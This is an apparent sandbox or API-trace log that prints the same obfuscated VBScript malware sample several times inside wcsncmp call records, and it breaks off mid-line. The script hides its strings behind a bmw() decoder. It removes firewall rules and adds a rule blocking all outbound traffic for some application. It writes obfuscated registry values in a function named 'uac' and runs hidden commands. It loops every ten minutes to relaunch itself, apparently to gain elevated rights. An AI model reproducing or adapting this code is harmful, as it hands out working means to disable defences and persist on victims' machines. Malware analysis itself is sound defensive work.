wcsncmp (_String1="m policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.331] wcsncmp (_String1=" policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.331] wcsncmp (_String1="policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0226.331] wcsncmp (_String1="olicy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0226.331] wcsncmp (_String1="licy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 